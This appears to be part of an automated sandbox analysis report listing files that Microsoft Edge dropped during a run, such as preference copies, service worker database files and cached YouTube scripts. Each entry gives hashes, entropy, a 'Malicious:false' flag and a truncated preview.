                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13352988565937492","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":914,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":70,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"li

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF41847.TMP (copy)

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):9814
                                                                                                                                                                                  Entropy (8bit):5.1110850546346915
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:st+SkdPKCs/13aFvrE9kgD3+M8WvbV+Fd4AQUIpKJxUHhPcYJ:st+SIKCs/13CDGS0vbGdXQUCKJSHj
                                                                                                                                                                                  MD5:5F421375843091990F3F9C0096861E8A
                                                                                                                                                                                  SHA1:819E4C5D0ACE858B039CCB3A6E3278BF1CA34262
                                                                                                                                                                                  SHA-256:B84C01CC68EF42FA433B3007FAC39A409565B727AAB602D755438537DE6CF421
                                                                                                                                                                                  SHA-512:36DAE27BA07F4FBF43468C1FB08EC0DC197341335190047A84553D144C22619E870904C262F7C63B45C03F0ACE87F9469BD663013566FE7F734F518396BA073D
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13352988565937492","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":914,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":70,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"li

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF43f86.TMP (copy)

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):9814
                                                                                                                                                                                  Entropy (8bit):5.1110850546346915
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:st+SkdPKCs/13aFvrE9kgD3+M8WvbV+Fd4AQUIpKJxUHhPcYJ:st+SIKCs/13CDGS0vbGdXQUCKJSHj
                                                                                                                                                                                  MD5:5F421375843091990F3F9C0096861E8A
                                                                                                                                                                                  SHA1:819E4C5D0ACE858B039CCB3A6E3278BF1CA34262
                                                                                                                                                                                  SHA-256:B84C01CC68EF42FA433B3007FAC39A409565B727AAB602D755438537DE6CF421
                                                                                                                                                                                  SHA-512:36DAE27BA07F4FBF43468C1FB08EC0DC197341335190047A84553D144C22619E870904C262F7C63B45C03F0ACE87F9469BD663013566FE7F734F518396BA073D
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13352988565937492","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":914,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":70,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"li

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF46742.TMP (copy)

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):9814
                                                                                                                                                                                  Entropy (8bit):5.1110850546346915
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:st+SkdPKCs/13aFvrE9kgD3+M8WvbV+Fd4AQUIpKJxUHhPcYJ:st+SIKCs/13CDGS0vbGdXQUCKJSHj
                                                                                                                                                                                  MD5:5F421375843091990F3F9C0096861E8A
                                                                                                                                                                                  SHA1:819E4C5D0ACE858B039CCB3A6E3278BF1CA34262
                                                                                                                                                                                  SHA-256:B84C01CC68EF42FA433B3007FAC39A409565B727AAB602D755438537DE6CF421
                                                                                                                                                                                  SHA-512:36DAE27BA07F4FBF43468C1FB08EC0DC197341335190047A84553D144C22619E870904C262F7C63B45C03F0ACE87F9469BD663013566FE7F734F518396BA073D
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13352988565937492","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":914,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":70,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"li

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF4ab01.TMP (copy)

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):9814
                                                                                                                                                                                  Entropy (8bit):5.1110850546346915
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:st+SkdPKCs/13aFvrE9kgD3+M8WvbV+Fd4AQUIpKJxUHhPcYJ:st+SIKCs/13CDGS0vbGdXQUCKJSHj
                                                                                                                                                                                  MD5:5F421375843091990F3F9C0096861E8A
                                                                                                                                                                                  SHA1:819E4C5D0ACE858B039CCB3A6E3278BF1CA34262
                                                                                                                                                                                  SHA-256:B84C01CC68EF42FA433B3007FAC39A409565B727AAB602D755438537DE6CF421
                                                                                                                                                                                  SHA-512:36DAE27BA07F4FBF43468C1FB08EC0DC197341335190047A84553D144C22619E870904C262F7C63B45C03F0ACE87F9469BD663013566FE7F734F518396BA073D
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13352988565937492","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":914,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":70,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"li

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences (copy)

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):24691
                                                                                                                                                                                  Entropy (8bit):5.567990619159357
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:V9ZxMjWfiW5wj2f4ji8F1+UoAYDCx9Tuqh0VfUC9xbog/OVPySIH0gOrwXthUpcm:Vvmj8iWaj2fGiu1jaXf/Ldxtk
                                                                                                                                                                                  MD5:1D2CA0D90087B30A444E6AA0C683AC73
                                                                                                                                                                                  SHA1:D47B84BE54902C9AA23CC3DAF0C8B667948D4A5A
                                                                                                                                                                                  SHA-256:7A9BF8225C24B4399E6B69D18E13E45E3011A5C519A7CDA78733CB8BF957E110
                                                                                                                                                                                  SHA-512:F444E88B78CF821E681CFF9D583F2D80014D183E7D2D2FE5E478BD0E56CC89266AF4B75CA1B8F0C4016A4540B856A793092C276CB43843A50DB9DD7A1BD824CA
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13352988565277124","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13352988565277124","location":5,"ma

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences~RF420d2.TMP (copy)

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):24691
                                                                                                                                                                                  Entropy (8bit):5.567990619159357
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:V9ZxMjWfiW5wj2f4ji8F1+UoAYDCx9Tuqh0VfUC9xbog/OVPySIH0gOrwXthUpcm:Vvmj8iWaj2fGiu1jaXf/Ldxtk
                                                                                                                                                                                  MD5:1D2CA0D90087B30A444E6AA0C683AC73
                                                                                                                                                                                  SHA1:D47B84BE54902C9AA23CC3DAF0C8B667948D4A5A
                                                                                                                                                                                  SHA-256:7A9BF8225C24B4399E6B69D18E13E45E3011A5C519A7CDA78733CB8BF957E110
                                                                                                                                                                                  SHA-512:F444E88B78CF821E681CFF9D583F2D80014D183E7D2D2FE5E478BD0E56CC89266AF4B75CA1B8F0C4016A4540B856A793092C276CB43843A50DB9DD7A1BD824CA
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13352988565277124","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13352988565277124","location":5,"ma

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences~RF45f14.TMP (copy)

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):24691
                                                                                                                                                                                  Entropy (8bit):5.567990619159357
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:V9ZxMjWfiW5wj2f4ji8F1+UoAYDCx9Tuqh0VfUC9xbog/OVPySIH0gOrwXthUpcm:Vvmj8iWaj2fGiu1jaXf/Ldxtk
                                                                                                                                                                                  MD5:1D2CA0D90087B30A444E6AA0C683AC73
                                                                                                                                                                                  SHA1:D47B84BE54902C9AA23CC3DAF0C8B667948D4A5A
                                                                                                                                                                                  SHA-256:7A9BF8225C24B4399E6B69D18E13E45E3011A5C519A7CDA78733CB8BF957E110
                                                                                                                                                                                  SHA-512:F444E88B78CF821E681CFF9D583F2D80014D183E7D2D2FE5E478BD0E56CC89266AF4B75CA1B8F0C4016A4540B856A793092C276CB43843A50DB9DD7A1BD824CA
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13352988565277124","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13352988565277124","location":5,"ma

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences~RF4c168.TMP (copy)

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):24691
                                                                                                                                                                                  Entropy (8bit):5.567990619159357
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:V9ZxMjWfiW5wj2f4ji8F1+UoAYDCx9Tuqh0VfUC9xbog/OVPySIH0gOrwXthUpcm:Vvmj8iWaj2fGiu1jaXf/Ldxtk
                                                                                                                                                                                  MD5:1D2CA0D90087B30A444E6AA0C683AC73
                                                                                                                                                                                  SHA1:D47B84BE54902C9AA23CC3DAF0C8B667948D4A5A
                                                                                                                                                                                  SHA-256:7A9BF8225C24B4399E6B69D18E13E45E3011A5C519A7CDA78733CB8BF957E110
                                                                                                                                                                                  SHA-512:F444E88B78CF821E681CFF9D583F2D80014D183E7D2D2FE5E478BD0E56CC89266AF4B75CA1B8F0C4016A4540B856A793092C276CB43843A50DB9DD7A1BD824CA
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13352988565277124","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13352988565277124","location":5,"ma

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000001.dbtmp

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:MANIFEST-000001.

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\CURRENT (copy)

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:MANIFEST-000001.

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\MANIFEST-000001

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:OpenPGP Secret Key
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):41
                                                                                                                                                                                  Entropy (8bit):4.704993772857998
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                  MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                  SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                  SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                  SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_0

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):16144
                                                                                                                                                                                  Entropy (8bit):6.310925271546827
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:8GUcH1qEcbuCp3bkQspksx1AJdJw2NS2BX/vk5bSxSGtOHu+JEYA:8GNHrAILpks4NnX/I8tBgA
                                                                                                                                                                                  MD5:E245F475CAAC0A491A1C022EF6FAA4A3
                                                                                                                                                                                  SHA1:F7CA7E93F41D5DE85A3AB2F2A4CB84F68B403B45
                                                                                                                                                                                  SHA-256:ADBCFA29A2940E8A8CB6EE1598A5A087AEF1F2CB4F9BE79D74F0715A3F971CCE
                                                                                                                                                                                  SHA-512:656BA4230E717F162B43069EA935D8B44C0E12C485417B254D29F4250832325DB03CB3D9E1C5D37FA319DA977E7E9C599F9368409099878FB8929CD19B3AC735
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:0\r..m..........rSG.....0/** 7745184845366216933 */self.document = self; self.window = self;var ytcfg={d:function(){return window.yt&&yt.config_||ytcfg.data_||(ytcfg.data_={})},get:function(k,o){return k in ytcfg.d()?ytcfg.d()[k]:o},set:function(){var a=arguments;if(a.length>1)ytcfg.d()[a[0]]=a[1];else{var k;for(k in a[0])ytcfg.d()[k]=a[0][k]}}};.ytcfg.set({"EXPERIMENT_FLAGS":{"H5_enable_full_pacf_logging":true,"H5_use_async_logging":true,"ab_det_apb_b":true,"ab_det_el_h":true,"ab_det_fet_wr":true,"ab_det_fet_wr_en":true,"ab_det_gen_re":true,"action_companion_center_align_description":true,"allow_skip_networkless":true,"clear_user_partitioned_ls":true,"compress_gel":true,"csi_config_handling_infra":true,"deprecate_csi_has_info":true,"disable_child_node_auto_formatted_strings":true,"disable_pacf_logging_for_memory_limited_tv":true,"disable_simple_mixed_direction_formatted_strings":true,"disable_thumbnail_preloading":true,"embeds_transport_use_scheduler":true,"enable_ab_report_on_errorsc

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_1

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):10537
                                                                                                                                                                                  Entropy (8bit):5.815453556950212
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:lzNjX/ndpmwU3p2viL5kygCagEAFR7V0Z4awpoSzSDS6vThOcC:Xr/njmwU3p2NfgEAFR7V06awpo8wZrQN
                                                                                                                                                                                  MD5:09647CF5C1EEFF36F42A8CC1FFF65EDA
                                                                                                                                                                                  SHA1:D39BE5D87A0D8D2B45E3AFABD0ABEA68660F58F7
                                                                                                                                                                                  SHA-256:272BCAF48570014EE60AE0A5595256F858A76BCC09AE9133D4626D2AB6465723
                                                                                                                                                                                  SHA-512:C996C5280C2D4FBD349B56653D401F40D1083A6D0E8F77B761D6AC495C5D384227DBACB128D8F3C74A4360186E79A12B6B571ED5B6BDFCF9F7CA61331C379E78
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:0\r..m..........rSG.....0...../...............R.......yT.(.......,T....`.....hL`0.....L`......RcJ.......ytcfg.....Rc..S.....policy...............$..a............C...C...C.,T.L.`V.....L`..........Rb.l|.....yt....Rc..b;....config_.....Rc...C....data_......Dm............!...-.....!...-.....!...-.....!...~.2........$Sb................`....Da............d..........`...P......H......,Q.(.bp....https://www.youtube.com/sw.js...a........Db............D`.......A.`............,T.L..`T.....L`..........Dm............!...-....]...r....!...-....]....../..........$Sb...............`....DaH..........c..........@......<e..........................,T...`......L`................D~X..............-......n... !...-....]...../...../..4....A./...;v............-........!...-....]...../...../..4.....,.......$Sb...............`....Da......... ..f.........D......`.... ...\...e..........................,T.$.`......L`......R......v...https://www.youtube.com/s/desktop/87423d78/jsbin/serviceworker-kevlar-appshell.v

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\4cb013792b196a35_0

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):164940
                                                                                                                                                                                  Entropy (8bit):5.629859160754584
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3072:QvX5Lw5UlDJVZHL08oy6CiEETgDAGXoY7xZSrnCvnxtsmEtn4DtATIcT3PY0At:QvX5LKUlDJVZHL08oyRiJsD7oYb/sHnw
                                                                                                                                                                                  MD5:B15EF10AB1B263DD903CF0AA4E2595D6
                                                                                                                                                                                  SHA1:C8E53DF596F2FC091A46C4B0181A33C54731CBCE
                                                                                                                                                                                  SHA-256:C4025F4007D69F7F07CD5607586E62D3D16E68C66844BC96CD652B79765BFDDB
                                                                                                                                                                                  SHA-512:9775B4000110F74889E29CF9DB5A3129B0160132DF4A395AF9F3E0AA6D1A487F7FB4CBDEB70D11EDECA2ECD0AF9F5E779DF319F3B8CC500EC1554FFFF541A8DB
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:0\r..m..........V.......1'use strict';var aa="function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ba(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}.var ca=ba(this);function da(a,b){if(b)a:{var c=ca;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&null!=b&&aa(c,a,{configurable:!0,writable:!0,value:b})}}.function ea(a){function b(d){return a.next(d)}.function c(d){return a.throw(d)}.return new Promise(function(d,e){function f(g){g.done?d(g.value):Promise.resolve(g.value).then(b,c).then(f,e)}.f(a.next())})}.function r(a){return ea(a())}.function fa(a,b){a instanceof String&&(a+="");var c=0,d=!1,e={next:funct

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\4cb013792b196a35_1

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):398769
                                                                                                                                                                                  Entropy (8bit):6.108365872630944
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:6144:SIAYEibUrKT0knEC56j+vAg/crWxIxhPBPjzmw7kwI:vJEibUra96j+v3q/BPjzm6k9
                                                                                                                                                                                  MD5:045B754F9E9B35696DA853A9CC7D2012
                                                                                                                                                                                  SHA1:75CCA2A3B9BE15A0CFB7EB2B1BDB93CD0A98CE13
                                                                                                                                                                                  SHA-256:70A6618B693D8C7E59E7B19C5430EF45EAE652920FE4F7AC46C2A2D265F4AAFE
                                                                                                                                                                                  SHA-512:35E460E8EB75B3310191B8893E29BB5CEFFE0EFB81CAD955F4221F8FFC1AE0D690B16A9D463DE7A580C48E853B691D9C1BFA1910BDAA541834B8367D3E3FFF39
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:0\r..m..........V.......1...../...............R.......yTX........,T.11..` b.....L`X......L`......Rb..v.....aa...,T...`.....,L`.......}.`......Le...........................................r......(Rh.......Cannot find global object......D.. ...........z..%...".. ...!..6........6......".. ...!..6......".. ...!..6......".. ...!..6........-...m...#../....-....!..k.........P..&..!......b..!..(Sb.............Rb..S.....ba..`....Dax...n....1.Sb.`...............c..................Rb........ug..`l.....Rb.4.=....pe..`N.....Rb........Zf..`f.....Rb..O.....em..`......Rb........vi..`.....D..Rb.`.0....Gj..`.....D..Rb&.......le..`L....D..1.`R.....Rb2`......Al..`......Rb60w.....Fj..`.....D..Rb>|rw....Bi..`......RbB<[t....eb..`......RbFt.X....Vf..`b.....RbF......Og..`p....D..RbV.].....Cl..`.....D..Rb^.1.....Gl..`.....D..Rbn..u....Wl..`......Rbr.5.....Ij..`......RbvH. ....wk..`.....D..Rb.x......Mh..`......Rb.h9r....Nf..`^....D..Rb.Dv.....Hj..`......Rb.\......ec..`$....D..Rb.p......Bb..`.....D..Rb.DK.

